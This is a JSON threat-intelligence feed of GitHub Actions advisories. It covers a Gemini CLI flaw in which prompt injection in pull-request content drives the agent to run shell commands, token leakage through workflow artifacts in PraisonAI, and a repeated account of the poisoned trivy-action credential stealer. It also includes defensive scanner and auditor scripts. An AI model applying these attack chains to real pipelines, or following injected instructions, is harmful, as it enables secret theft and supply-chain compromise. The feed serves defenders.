{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/github-actions/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Gemini CLI","run-gemini-cli GitHub Action"],"_cs_severities":["critical"],"_cs_tags":["rce","supply-chain","github-actions"],"_cs_type":"advisory","_cs_vendors":["Google"],"content_html":"\u003cp\u003eGemini CLI (\u003ccode\u003e@google/gemini-cli\u003c/code\u003e) versions prior to 0.39.1 and version 0.40.0-preview.2, along with the \u003ccode\u003erun-gemini-cli\u003c/code\u003e GitHub Action versions prior to 0.1.22, are susceptible to remote code execution due to insecure workspace trust handling and tool allowlisting bypasses. Two weaknesses are involved. In headless mode the CLI trusted the workspace folder automatically, so a \u003ccode\u003e.gemini/\u003c/code\u003e directory controlled by whoever authored the checked-out code could supply environment variables that the CLI loaded without confirmation. Separately, in \u003ccode\u003e--yolo\u003c/code\u003e mode the tool allowlist was ignored, so a prompt injection could call tools such as \u003ccode\u003erun_shell_command\u003c/code\u003e and run arbitrary commands. The exposure is greatest in CI/CD workflows that feed the CLI untrusted input such as pull request content. The patched version 0.39.1 requires explicit folder trust in headless mode and evaluates tool allowlists under \u003ccode\u003e--yolo\u003c/code\u003e. 
This impacts all Gemini CLI GitHub Actions and requires users to review their workflows.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker submits a malicious pull request to a repository that runs Gemini CLI in a GitHub Actions workflow triggered by pull requests.\u003c/li\u003e\n\u003cli\u003eThe workflow, running in headless mode, automatically trusts the workspace folder (versions prior to 0.39.1).\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s pull request includes a crafted \u003ccode\u003e.gemini/\u003c/code\u003e directory containing malicious environment variables.\u003c/li\u003e\n\u003cli\u003eGemini CLI loads the malicious environment variables, leading to code execution.\u003c/li\u003e\n\u003cli\u003eAlternatively, or in addition, the attacker places a prompt injection in the pull request content that steers the model toward \u003ccode\u003erun_shell_command\u003c/code\u003e when \u003ccode\u003e--yolo\u003c/code\u003e is used.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003erun_shell_command\u003c/code\u003e tool executes arbitrary commands on the runner because the tool allowlist is bypassed (versions prior to 0.39.1).\u003c/li\u003e\n\u003cli\u003eEither path gives the attacker code execution on the CI/CD runner, from which secrets can be exfiltrated or malicious code injected into the deployment pipeline, resulting in a supply chain compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe vulnerability impacts workflows utilizing Gemini CLI in headless mode, particularly those processing untrusted inputs such as pull requests from external contributors. Successful exploitation can lead to remote code execution on the CI/CD runner, potentially enabling attackers to exfiltrate sensitive information, such as API keys and credentials, or inject malicious code into the application deployment pipeline. 
This can lead to a supply chain compromise. All Gemini CLI GitHub Actions are affected, requiring users to review and update their workflows.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade \u003ccode\u003e@google/gemini-cli\u003c/code\u003e to version 0.39.1 or later, or 0.40.0-preview.3 if using a preview version.\u003c/li\u003e\n\u003cli\u003eUpgrade the \u003ccode\u003egoogle-github-actions/run-gemini-cli\u003c/code\u003e action to version 0.1.22 or later.\u003c/li\u003e\n\u003cli\u003eFor workflows that run only on trusted inputs (for example pushes to protected branches by maintainers), set \u003ccode\u003eGEMINI_TRUST_WORKSPACE: 'true'\u003c/code\u003e in the GitHub Actions workflow.\u003c/li\u003e\n\u003cli\u003eFor workflows processing untrusted inputs such as pull requests from forks, do not grant workspace trust; review the hardening guidance in \u003ca href=\"https://github.com/google-github-actions/run-gemini-cli\"\u003egoogle-github-actions/run-gemini-cli\u003c/a\u003e and set the environment variable accordingly.\u003c/li\u003e\n\u003cli\u003eReview and harden tool allowlists in \u003ccode\u003e~/.gemini/settings.json\u003c/code\u003e to restrict the commands that can be executed, and avoid \u003ccode\u003e--yolo\u003c/code\u003e on workflows that see untrusted content even after patching, since it removes the per-tool confirmation step.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-24T19:30:01Z","date_published":"2026-04-24T19:30:01Z","id":"/briefs/2026-04-gemini-cli-rce/","summary":"Gemini CLI is vulnerable to remote code execution via workspace trust and tool allowlisting bypasses, impacting headless mode and GitHub Actions workflows.","title":"Gemini CLI Remote Code Execution via Workspace Trust and Tool Allowlisting 
Bypasses","url":"https://feed.craftedsignal.io/briefs/2026-04-gemini-cli-rce/"},{"_cs_actors":[],"_cs_cves":[{"cvss":9.1,"id":"CVE-2026-40313"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["credential-leakage","supply-chain","github-actions","cve-2026-40313"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003ePraisonAI, a multi-agent teams system, faces a critical vulnerability (CVE-2026-40313) in versions 4.5.139 and below. The vulnerability stems from the ArtiPACKED attack vector within GitHub Actions workflows. Specifically, using \u003ccode\u003eactions/checkout\u003c/code\u003e without \u003ccode\u003epersist-credentials: false\u003c/code\u003e leaves the GITHUB_TOKEN in the \u003ccode\u003e.git/config\u003c/code\u003e file, stored as a base64-encoded basic-auth \u003ccode\u003eextraheader\u003c/code\u003e for github.com. When subsequent workflow steps upload artifacts (build outputs, logs, test results, etc.) whose path includes the \u003ccode\u003e.git\u003c/code\u003e directory, the token travels with them. Given that PraisonAI is a public repository, anyone with a GitHub account can download these artifacts and extract the leaked token. GITHUB_TOKEN is revoked when the job that created it completes, so the attacker must fetch the artifact and use the token while that workflow run is still in progress; a longer-lived credential passed to \u003ccode\u003eactions/checkout\u003c/code\u003e through its \u003ccode\u003etoken\u003c/code\u003e input and persisted the same way carries no such limit. With a valid token, an attacker can push malicious code, poison releases and PyPI/Docker packages, steal repository secrets, and ultimately compromise the entire supply chain, affecting all downstream users. The issue is present across multiple workflow and action files within the \u003ccode\u003e.github/workflows/\u003c/code\u003e and \u003ccode\u003e.github/actions/\u003c/code\u003e directories. 
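\u003c/p\u003e\n\u003cp\u003eThe script below is an added example, not code from the PraisonAI project or from the CVE advisory. It scans an unpacked artifact for the credential shape described above: the \u003ccode\u003eextraheader\u003c/code\u003e entry that \u003ccode\u003eactions/checkout\u003c/code\u003e writes into \u003ccode\u003e.git/config\u003c/code\u003e (\u003ccode\u003eAUTHORIZATION: basic\u003c/code\u003e followed by the base64 of \u003ccode\u003ex-access-token:TOKEN\u003c/code\u003e) and, because some tooling embeds credentials in the remote URL instead, \u003ccode\u003eurl\u003c/code\u003e values of the form \u003ccode\u003ehttps://user:TOKEN@host/...\u003c/code\u003e. The sample \u003ccode\u003e.git/config\u003c/code\u003e and the \u003ccode\u003eghs_\u003c/code\u003e-prefixed token in it are constructed placeholders, not values taken from any repository.\u003c/p\u003e
```python
# Added example (not code from the PraisonAI project or from the CVE advisory):
# scan an extracted GitHub Actions artifact for the credential that
# actions/checkout persists when persist-credentials is left at its default.
# checkout writes the token into .git/config as an extraheader entry of the form
#   extraheader = AUTHORIZATION: basic base64(x-access-token:TOKEN)
# Some tooling instead embeds tokens in the remote URL (https://user:TOKEN@host/...),
# so both shapes are checked. Findings are redacted so this scanner never writes
# a usable secret into a log of its own.
import base64
import os
import sys

NL = chr(10)   # newline character, used to assemble the multi-line sample below
DQ = chr(34)   # double-quote character; git quotes subsection names in section headers


def _redact(secret):
    # Keep the prefix that identifies the token type (ghs_ for GITHUB_TOKEN) and the length.
    return secret[:4] + '...' + f'({len(secret)} chars)'


def find_leaked_tokens(git_config_text):
    # Return (kind, user, redacted_token) tuples for one .git/config body.
    findings = []
    for raw in git_config_text.splitlines():
        key, sep, value = raw.strip().partition('=')
        if not sep:
            continue
        key, value = key.strip().lower(), value.strip()
        if key == 'extraheader' and value.lower().startswith('authorization: basic '):
            blob = value.split()[-1]
            try:
                decoded = base64.b64decode(blob, validate=True).decode('utf-8')
            except ValueError:
                continue   # not valid base64 or not UTF-8 (binascii.Error is a ValueError): leave for manual review
            user, colon, token = decoded.partition(':')
            if colon and token:
                findings.append(('extraheader', user, _redact(token)))
        elif key == 'url' and '://' in value and '@' in value:
            # userinfo part of https://user:token@host/path
            creds = value.split('://', 1)[1].rsplit('@', 1)[0]
            user, colon, token = creds.partition(':')
            if colon and token:
                findings.append(('remote-url', user, _redact(token)))
    return findings


def scan_artifact_dir(root):
    # Walk an unpacked artifact and check every .git/config it contains.
    # Returns {path relative to root: findings}; an empty dict means nothing was found.
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        if os.path.basename(dirpath) != '.git' or 'config' not in files:
            continue
        path = os.path.join(dirpath, 'config')
        with open(path, encoding='utf-8', errors='replace') as handle:
            found = find_leaked_tokens(handle.read())
        if found:
            report[os.path.relpath(path, root)] = found
    return report


# Constructed sample input: the .git/config shape actions/checkout leaves behind.
# The token is a placeholder string, not a real credential.
PLACEHOLDER_TOKEN = 'ghs_ExampleTokenValueNotReal0000000000'
BASIC_BLOB = base64.b64encode(('x-access-token:' + PLACEHOLDER_TOKEN).encode('utf-8')).decode('ascii')
SAMPLE_GIT_CONFIG = NL.join([
    '[core]',
    '    repositoryformatversion = 0',
    '[remote ' + DQ + 'origin' + DQ + ']',
    '    url = https://github.com/example-org/example-repo',
    '    fetch = +refs/heads/*:refs/remotes/origin/*',
    '[http ' + DQ + 'https://github.com/' + DQ + ']',
    '    extraheader = AUTHORIZATION: basic ' + BASIC_BLOB,
])

if __name__ == '__main__':
    # With a directory argument, scan it; otherwise demonstrate on the built-in sample.
    if len(sys.argv) == 2:
        for path, found in scan_artifact_dir(sys.argv[1]).items():
            print(path, found)
    else:
        print(find_leaked_tokens(SAMPLE_GIT_CONFIG))
```
\u003cp\u003eSaved as, say, \u003ccode\u003escan_artifact.py\u003c/code\u003e, it runs as \u003ccode\u003epython scan_artifact.py ./unpacked-artifact\u003c/code\u003e; with no argument it demonstrates on the built-in sample. A non-empty report means the token in that artifact must be treated as exposed for the remainder of the job that produced it, and the producing workflow needs \u003ccode\u003epersist-credentials: false\u003c/code\u003e or an upload path that excludes \u003ccode\u003e.git\u003c/code\u003e.\u003c/p\u003e\n\u003cp\u003e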
Version 4.5.140 addresses and resolves this vulnerability.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe PraisonAI repository is public, so the attacker can browse its workflow runs and download their artifacts without any special access.\u003c/li\u003e\n\u003cli\u003eAttacker identifies a GitHub Actions workflow that uploads artifacts.\u003c/li\u003e\n\u003cli\u003eThe workflow uses \u003ccode\u003eactions/checkout\u003c/code\u003e without \u003ccode\u003epersist-credentials: false\u003c/code\u003e, causing the GITHUB_TOKEN to be written to \u003ccode\u003e.git/config\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe workflow uploads an artifact (e.g., build output, logs, test results) that includes the \u003ccode\u003e.git/config\u003c/code\u003e file.\u003c/li\u003e\n\u003cli\u003eAttacker downloads the artifact.\u003c/li\u003e\n\u003cli\u003eAttacker extracts the GITHUB_TOKEN from the \u003ccode\u003e.git/config\u003c/code\u003e file within the artifact.\u003c/li\u003e\n\u003cli\u003eAttacker uses the leaked GITHUB_TOKEN to authenticate to the PraisonAI repository while the originating job is still running.\u003c/li\u003e\n\u003cli\u003eAttacker leverages the compromised GITHUB_TOKEN to inject malicious code, poison releases/packages, steal secrets, or perform other malicious activities, leading to a supply chain compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-40313 in PraisonAI versions 4.5.139 and below can result in a severe supply chain compromise. Attackers can inject malicious code into the PraisonAI repository, poison releases and associated packages (PyPI, Docker), and steal sensitive repository secrets. This can lead to widespread distribution of malware to downstream users of PraisonAI, compromising their systems and data. 
The vulnerability affects any user relying on PraisonAI and its distributed components.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade PraisonAI to version 4.5.140 or later to patch CVE-2026-40313.\u003c/li\u003e\n\u003cli\u003eAudit all GitHub Actions workflows in your organization to ensure that \u003ccode\u003eactions/checkout\u003c/code\u003e is used with \u003ccode\u003epersist-credentials: false\u003c/code\u003e (the default is \u003ccode\u003etrue\u003c/code\u003e) unless a later step in the same job genuinely needs the token to push, and keep \u003ccode\u003e.git\u003c/code\u003e out of artifact upload paths as a second line of defence.\u003c/li\u003e\n\u003cli\u003eSet a restrictive top-level \u003ccode\u003epermissions:\u003c/code\u003e block in each workflow so that GITHUB_TOKEN carries only the scopes the job needs; a leaked read-only token cannot push code or tamper with releases.\u003c/li\u003e\n\u003cli\u003eMonitor public repositories for inadvertently exposed configuration files containing credentials, and rotate potentially compromised tokens immediately.\u003c/li\u003e\n\u003cli\u003eImplement the Sigma rule \u0026ldquo;Detect GitHub Workflow Artifact Containing Git Config\u0026rdquo; to identify leaked git configurations.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-14T04:17:13Z","date_published":"2026-04-14T04:17:13Z","id":"/briefs/2026-04-praisonai-artifact-leakage/","summary":"PraisonAI versions 4.5.139 and below are vulnerable to credential leakage due to the ArtiPACKED attack, where GitHub Actions workflows using actions/checkout without persist-credentials: false write the GITHUB_TOKEN into the .git/config file, leading to potential exposure in uploaded artifacts and subsequent supply chain compromise.","title":"PraisonAI GitHub Actions Credential Leakage Vulnerability (CVE-2026-40313)","url":"https://feed.craftedsignal.io/briefs/2026-04-praisonai-artifact-leakage/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","github-actions","credential-theft"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 19, 2026, CrowdStrike detected a spike in script execution on Linux-based GitHub Actions runners. 
Investigation traced the activity to a compromise of the aquasecurity/trivy-action GitHub Action, a widely used open-source vulnerability scanner in CI/CD pipelines. The compromise involved retroactively poisoning 76 of the scanner\u0026rsquo;s 77 release tags through git tag repointing. This replaced the legitimate entry point with a multi-stage credential stealer. The malicious code ran before the actual scanner, making the compromise difficult to detect as workflows appeared to complete normally. Aqua Security confirmed the compromise of the Trivy GitHub Action script, setup script, and binary, and removed the malicious artifacts. This supply chain attack highlights the risk of relying on third-party actions in CI/CD pipelines without proper verification and monitoring.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA developer pushes code, opens a pull request, or merges a branch in a repository using the compromised trivy-action.\u003c/li\u003e\n\u003cli\u003eThe GitHub Actions runner executes the workflow, downloading the specified version of the trivy-action. 
Due to tag repointing, a malicious version of the action is downloaded instead of the legitimate one.\u003c/li\u003e\n\u003cli\u003eThe malicious \u003ccode\u003eentrypoint.sh\u003c/code\u003e script is executed, which prepends approximately 105 lines of attack code before the original Trivy scanner logic.\u003c/li\u003e\n\u003cli\u003eThe malicious script enumerates process IDs (PIDs) on the runner to identify potential targets.\u003c/li\u003e\n\u003cli\u003eThe script executes a multi-stage credential theft operation, stealing secrets and credentials available within the runner environment.\u003c/li\u003e\n\u003cli\u003eThe legitimate Trivy scanner is executed after the malicious code, masking the compromise as the workflow appears to complete successfully.\u003c/li\u003e\n\u003cli\u003eStolen credentials are exfiltrated to a destination controlled by the attacker.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen credentials to gain unauthorized access to internal infrastructure, cloud resources, or other sensitive systems.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis supply chain compromise affected users of the aquasecurity/trivy-action GitHub Action. The retroactive poisoning of 76 release tags meant that any CI/CD pipeline using those versions of the action was potentially compromised. The impact included the potential theft of sensitive credentials, secrets, and API keys stored within the GitHub Actions runner environment. Successful credential theft could lead to unauthorized access to critical infrastructure, data breaches, and further downstream attacks. 
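\u003c/p\u003e\n\u003cp\u003eThe following is an added example, not code from Aqua Security, CrowdStrike, GitHub or any project named in these briefs. It audits workflow files for the two weaknesses the briefs on this page turn on: third-party actions referenced by a mutable tag or branch rather than a full commit SHA, which is what made the tag repointing described here possible, and \u003ccode\u003eactions/checkout\u003c/code\u003e steps that leave \u003ccode\u003epersist-credentials\u003c/code\u003e at its default, which is the exposure behind the PraisonAI brief (CVE-2026-40313) above. The two embedded workflows are constructed samples, and \u003ccode\u003ePLACEHOLDER_SHA\u003c/code\u003e is a stand-in for a commit you have reviewed, not a real trivy-action or checkout commit.\u003c/p\u003e
```python
# Added example (not code from Aqua Security, CrowdStrike, PraisonAI or GitHub):
# a dependency-free auditor for GitHub Actions workflow files. It flags
# (1) third-party actions referenced by a mutable tag or branch instead of a full
#     40-hex commit SHA: a tag can be repointed, which is how 76 of 77
#     trivy-action tags were poisoned;
# (2) actions/checkout steps that leave persist-credentials at its default of
#     true, so GITHUB_TOKEN lands in .git/config and can ride along in uploaded
#     artifacts (the PraisonAI finding).
# YAML is read line by line so no third-party module is needed; the parser covers
# the usual steps-list layout rather than every YAML construct.
import glob
import os
import sys

HEX = set('0123456789abcdef')


def _steps(workflow_text):
    # Flatten each steps-list item into a {key: value} dict.
    # step_indent is None outside a steps list and -1 between steps: and its first item.
    steps, current, step_indent = [], None, None
    for raw in workflow_text.splitlines():
        stripped = raw.strip()
        if not stripped or stripped.startswith('#'):
            continue
        indent = len(raw) - len(raw.lstrip())
        if stripped == 'steps:':
            step_indent, current = -1, None
            continue
        if step_indent is None:
            continue
        if step_indent == -1 and stripped.startswith('- '):
            step_indent = indent   # the first item fixes the indentation of the list
        if indent in range(step_indent):
            step_indent, current = None, None   # shallower line: the list has ended
            continue
        if indent == step_indent and stripped.startswith('- '):
            current = {}
            steps.append(current)
            stripped = stripped[2:].strip()
        if current is not None:
            key, sep, value = stripped.partition(':')
            key = key.strip()
            if sep and key and ' ' not in key:   # skip script lines inside run: blocks
                current.setdefault(key, value.strip())
    return [step for step in steps if 'uses' in step]


def audit_workflow(workflow_text):
    # Return (finding, uses_reference) pairs in file order; an empty list is a clean file.
    findings = []
    for step in _steps(workflow_text):
        uses = step['uses'].split('#')[0].strip()   # drop a trailing YAML comment
        if uses.startswith('./') or uses.startswith('docker://'):
            continue   # local actions and container images are outside this check
        repo, at, ref = uses.partition('@')
        pinned = at == '@' and len(ref) == 40 and set(ref.lower()).issubset(HEX)
        if not pinned:
            findings.append(('unpinned-ref', uses))
        if repo == 'actions/checkout' and step.get('persist-credentials', 'true').lower() != 'false':
            findings.append(('checkout-persists-token', uses))
    return findings


def audit_directory(repo_root):
    # Audit every workflow file under .github/workflows; returns {path: findings}.
    workflows = os.path.join(repo_root, '.github', 'workflows')
    paths = glob.glob(os.path.join(workflows, '*.yml')) + glob.glob(os.path.join(workflows, '*.yaml'))
    report = {}
    for path in sorted(paths):
        with open(path, encoding='utf-8') as handle:
            found = audit_workflow(handle.read())
        if found:
            report[path] = found
    return report


# Constructed sample: the weak shape described in these briefs. The trivy-action
# tag is the one named in the attack chain; checkout keeps its default.
VULNERABLE_WORKFLOW = '''
name: ci
on: [push, pull_request]
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0
      - name: Scan
        uses: aquasecurity/trivy-action@0.24.0
        with:
          scan-type: fs
      - uses: actions/upload-artifact@v4
        with:
          name: scan-output
          path: .
'''

# Constructed hardened form. PLACEHOLDER_SHA is not a real commit: resolve the SHA
# of the release you reviewed (for example with git ls-remote --tags) and pin that.
PLACEHOLDER_SHA = '0123456789abcdef0123456789abcdef01234567'
HARDENED_WORKFLOW = f'''
name: ci
on: [push, pull_request]
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@{PLACEHOLDER_SHA}  # v4
        with:
          fetch-depth: 0
          persist-credentials: false
      - name: Scan
        uses: aquasecurity/trivy-action@{PLACEHOLDER_SHA}  # 0.24.0, reviewed
        with:
          scan-type: fs
'''

if __name__ == '__main__':
    # With a repository path argument, audit its workflows; otherwise show both samples.
    if len(sys.argv) == 2:
        for path, found in audit_directory(sys.argv[1]).items():
            print(path, found)
    else:
        print('vulnerable:', audit_workflow(VULNERABLE_WORKFLOW))
        print('hardened:  ', audit_workflow(HARDENED_WORKFLOW))
```
\u003cp\u003eRun it against a checkout of your repository (\u003ccode\u003epython audit_workflows.py /path/to/repo\u003c/code\u003e); with no argument it reports on the two samples. Pinning to a SHA only helps if that SHA was resolved from a release you inspected, so resolve tags with \u003ccode\u003egit ls-remote --tags\u003c/code\u003e against the upstream repository and compare them with any known-good commits Aqua Security publishes, rather than trusting whatever the tag points to today.\u003c/p\u003e\n\u003cp\u003e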
The number of affected organizations is unknown, but given the popularity of trivy-action, the scope could be significant.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReview your GitHub Actions workflows for usage of \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e and verify the integrity of the action\u0026rsquo;s code. Pin third-party actions to full commit SHAs rather than tags, since a tag can be repointed at any time, and resolve each SHA from a release you have reviewed.\u003c/li\u003e\n\u003cli\u003eTreat every secret, cloud credential and deploy token exposed to a job that ran a poisoned tag as compromised and rotate it; a workflow that completed normally is not evidence that it was clean, because the legitimate scanner still ran after the stealer.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Suspicious Script Execution in GitHub Actions Runner\u003c/code\u003e to identify potentially malicious script execution within GitHub Actions runner environments.\u003c/li\u003e\n\u003cli\u003eMonitor process execution on GitHub Actions runners for unusual or unexpected activity, particularly scripts running from temporary directories, to detect deviations from expected CI/CD behavior.\u003c/li\u003e\n\u003cli\u003eImplement strict access controls and credential management policies for GitHub Actions secrets and credentials to minimize the impact of potential credential theft.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-31T08:36:29Z","date_published":"2026-03-31T08:36:29Z","id":"/briefs/2026-04-trivy-supply-chain/","summary":"The trivy-action GitHub Action was compromised via git tag repointing, where 76 of 77 release tags were retroactively poisoned, leading to a multi-stage credential theft operation discovered following a spike in script execution detections on Linux runners.","title":"Compromised trivy-action GitHub Action Leads to Credential Theft","url":"https://feed.craftedsignal.io/briefs/2026-04-trivy-supply-chain/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","github-actions","credential-theft"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 19, 2026, a spike in 
suspicious script executions on Linux GitHub Actions runners was observed across multiple CrowdStrike Falcon platform customers. The investigation traced the activity to a supply chain compromise within the widely-used aquasecurity/trivy-action GitHub Action, a popular open-source vulnerability scanner used in CI/CD pipelines. Attackers retroactively poisoned 76 out of 77 release tags by repointing them to malicious commits. This allowed them to inject a multi-stage credential stealer into the action\u0026rsquo;s \u003ccode\u003eentrypoint.sh\u003c/code\u003e script. The malicious code executes before the legitimate scanner, making the compromise less noticeable. Aqua Security confirmed the compromise of the Trivy GitHub Action script, setup script, and binary and has removed the malicious artifacts. This incident highlights the risks associated with trusting third-party actions in CI/CD pipelines and the potential for attackers to exploit tag mutability in Git.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains unauthorized write access to the \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e GitHub repository.\u003c/li\u003e\n\u003cli\u003eThe attacker retroactively modifies existing Git tags (e.g., \u003ccode\u003e0.24.0\u003c/code\u003e) to point to a malicious commit.\u003c/li\u003e\n\u003cli\u003eThe malicious commit injects approximately 105 lines of malicious code into the \u003ccode\u003eentrypoint.sh\u003c/code\u003e script, prepended before the legitimate Trivy scanner logic.\u003c/li\u003e\n\u003cli\u003eA GitHub Actions workflow includes a step using the compromised \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e by referencing a poisoned tag (e.g., \u003ccode\u003e- uses: aquasecurity/trivy-action@0.24.0\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eWhen the workflow runs on a GitHub Actions runner, the runner downloads the compromised action and 
executes the malicious \u003ccode\u003eentrypoint.sh\u003c/code\u003e script.\u003c/li\u003e\n\u003cli\u003eThe malicious code in \u003ccode\u003eentrypoint.sh\u003c/code\u003e enumerates running processes to identify potential credential sources and exfiltrates sensitive data.\u003c/li\u003e\n\u003cli\u003eThe legitimate Trivy scanner executes, masking the malicious activity.\u003c/li\u003e\n\u003cli\u003eThe attacker gains access to stolen credentials, secrets, and API keys, potentially allowing them to compromise cloud infrastructure, internal systems, and source code repositories.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis supply chain attack directly impacted organizations using the compromised \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e GitHub Action in their CI/CD pipelines. The number of affected organizations is currently unknown, but given the action\u0026rsquo;s popularity, it is likely significant. Successful exploitation allows attackers to steal sensitive credentials, including API keys, cloud credentials, and deploy tokens. This can lead to unauthorized access to internal infrastructure, data exfiltration, and further compromise of the software supply chain. 
The incident highlights the critical importance of verifying the integrity of third-party dependencies and implementing robust security measures in CI/CD environments.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImmediately audit your GitHub Actions workflows for usage of the \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e and update to a safe version (as provided by Aqua Security) or remove the action entirely.\u003c/li\u003e\n\u003cli\u003eImplement integrity checks for third-party GitHub Actions by verifying the commit SHA instead of relying solely on tags to mitigate tag re-pointing attacks.\u003c/li\u003e\n\u003cli\u003eMonitor process execution on GitHub Actions runners for suspicious scripts, especially those running from within action directories, using process creation logs. An example detection rule is provided below.\u003c/li\u003e\n\u003cli\u003eEnable network connection logging on GitHub Actions runners to identify potential data exfiltration attempts originating from action scripts.\u003c/li\u003e\n\u003cli\u003eReview GitHub Actions logs for any anomalies or unexpected behavior that may indicate a compromise.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-31T07:24:09Z","date_published":"2026-03-31T07:24:09Z","id":"/briefs/2026-04-trivy-action-supply-chain/","summary":"The aquasecurity/trivy-action GitHub Action was compromised via git tag repointing, injecting malicious code into the entrypoint.sh script to steal credentials from CI/CD pipelines before executing the legitimate Trivy scanner.","title":"Compromised trivy-action GitHub Action Leads to Credential 
Theft","url":"https://feed.craftedsignal.io/briefs/2026-04-trivy-action-supply-chain/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","github-actions","credential-theft","linux"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 19, 2026, CrowdStrike detected a spike in suspicious script executions on Linux-based GitHub Actions runners, which led to the discovery of a supply chain compromise affecting the \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e GitHub Action. This action is a popular open-source vulnerability scanner frequently used in CI/CD pipelines. The attacker retroactively poisoned 76 of the 77 release tags by repointing them to malicious commits. These commits replaced the legitimate entry point with a multi-stage credential stealer. The injected code executes before the original scanner, allowing workflows to complete seemingly normally while secretly exfiltrating sensitive information. Aqua Security has confirmed and removed the malicious artifacts. This incident highlights the risks associated with mutable tags in Git-based workflows and the importance of verifying action integrity.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains write access to the \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e repository on GitHub.\u003c/li\u003e\n\u003cli\u003eThe attacker modifies the action\u0026rsquo;s \u003ccode\u003eentrypoint.sh\u003c/code\u003e script to include malicious code for credential theft. 
Specifically, the attacker prepends approximately 105 lines of malicious code.\u003c/li\u003e\n\u003cli\u003eThe attacker uses git tag repointing to retroactively poison existing release tags (e.g., \u003ccode\u003e@0.24.0\u003c/code\u003e) to point to the malicious commit.\u003c/li\u003e\n\u003cli\u003eDevelopers\u0026rsquo; CI/CD pipelines reference the compromised \u003ccode\u003etrivy-action\u003c/code\u003e using a poisoned tag (e.g., \u003ccode\u003eaquasecurity/trivy-action@0.24.0\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eWhen a workflow runs, the GitHub Actions runner downloads and executes the malicious \u003ccode\u003eentrypoint.sh\u003c/code\u003e script, granting it access to the runner\u0026rsquo;s environment, secrets, and network.\u003c/li\u003e\n\u003cli\u003eThe malicious script enumerates running processes to identify potential targets for credential theft.\u003c/li\u003e\n\u003cli\u003eThe malicious code exfiltrates credentials and secrets.\u003c/li\u003e\n\u003cli\u003eThe original \u003ccode\u003etrivy\u003c/code\u003e scanner is executed, masking the malicious activity and allowing the workflow to complete normally.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe compromise of the \u003ccode\u003etrivy-action\u003c/code\u003e GitHub Action allowed attackers to steal credentials and secrets from CI/CD pipelines that used the compromised action. Because the malicious code ran with the full privileges of the runner, it had access to sensitive information such as API keys, deployment tokens, and cloud credentials. The number of affected organizations is unknown, but given the widespread adoption of 